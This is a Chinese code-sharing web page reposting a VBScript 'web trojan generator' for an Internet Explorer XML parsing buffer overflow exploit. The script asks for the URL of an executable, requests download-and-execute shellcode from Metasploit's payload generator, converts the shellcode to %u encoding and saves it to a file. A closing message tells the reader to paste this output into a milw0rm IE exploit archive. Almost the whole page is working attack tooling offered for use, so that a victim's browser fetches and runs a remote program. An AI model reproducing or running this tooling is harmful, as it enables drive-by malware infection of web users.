首页脚本网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

时间2024-02-11 11:41:03发布访客分类脚本浏览211
导读:收集整理的这篇文章主要介绍了网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista 0day,觉得挺不错的,现在分享给大家,也给大家做个参考。...
收集整理的这篇文章主要介绍了网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day,觉得挺不错的,现在分享给大家,也给大家做个参考。 'code by lcx

On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploIT.COM:55555/PAYLOADS?parent=GLOB%280x25bfa38%29& MODULE=win32_downloadexec& mODE=GENERATE& OPT_URL="& URLEncoding(Exeurl)& "& MaxSize=& BadChars=0x00+& ENCODER=default& ACTION=Generate+Payload"


Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+/div> /PRe> )"

Set Matches = Re.Execute(Body)
If Matches.Count> 0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),"; ",""),"/div> /pre> ",""),Chr(10),""),".",""))

function replACERegex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function


Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytestoBstr(t, "GB2312")
End Function

Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.OPEn "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function

Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) & HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode 0 Then
innerCode = innerCode + & h10000
End If
Hight8 = (innerCode And & HFF00)\ & HFF
Low8 = innerCode And & HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function

set fso=CreateObject("scripting.fileSystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing

wscript.echo Chr(13)& "ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"

声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!


若转载请注明出处: 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
本文地址: https://pptw.com/jishu/609752.html
VBS Runas 自动输入密码, 明文 vbscript 三个数比较大小的实现代码

游客 回复需填写必要信息